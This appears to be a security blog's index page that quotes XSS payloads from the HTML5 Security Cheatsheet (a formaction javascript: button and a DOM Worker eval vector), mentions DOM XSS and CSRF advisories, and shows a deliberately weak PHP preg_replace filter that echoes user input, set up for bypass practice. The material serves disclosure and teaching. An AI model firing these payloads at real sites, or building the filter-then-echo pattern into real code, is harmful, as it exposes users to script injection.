Skip to content

HTML5 Security Cheatsheet

Here you can find the HTML5 Security Cheatsheet, which is a nice source of some good XSS payloads.

For Example:

XSS via formaction – requiring user interaction (1)

A vector displaying the HTML5 form and formaction capabilities for form hijacking outside the actual form
<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>
Self-including DOM Worker XSS
A self-including code snippet utilizing a DOM worker and firing a message event to itself causing script execution
0?<script>Worker("#").onmessage=function()eval(.data)</script> :postMessage(importScripts(‘data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk’))
Self-hijacking JSON literals
In case parts of a JSON literal are controlled by user input there’s a risk to allow auto-harvesting values from later object members.

[Video] - SSCHADV2013-009 - - DOM based Cross-site Scripting vulnerability

And here is a link to the video on youtube:
Enjoy yourself!

Shame on me ;-)

I totally forget to publish my Security Advisory about some Cross-Site Request Forgery & Cross-site Scripting vulnerabilities on So I published it today.
And here is the link to the advisory SSCHADV2012-099 and here are some pictures about the XSS by html file (1, 2), txt file (1, 2, 3) and two videos about the CSRF vulnerabilities :)
Continue reading "Shame on me ;-)"

Bypass 'preg_replace' XSS filter

// xss.php (Download)
$message = $_GET[‘xss’];

$message = 
preg_replace( ‘/<script[^\>]*>|<\/script>|(onabort|onblur|onchange|onclick|ondbclick|onerror|onfocus|onkeydown|onkeypress|
onreset|onresize|onselect|onsubmit|onunload)\s*=\s*"[^"]+"/i’, ‘’, $message );
echo $message;
Continue reading "Bypass 'preg_replace' XSS filter"
Imprint | Contact | Privacy Statement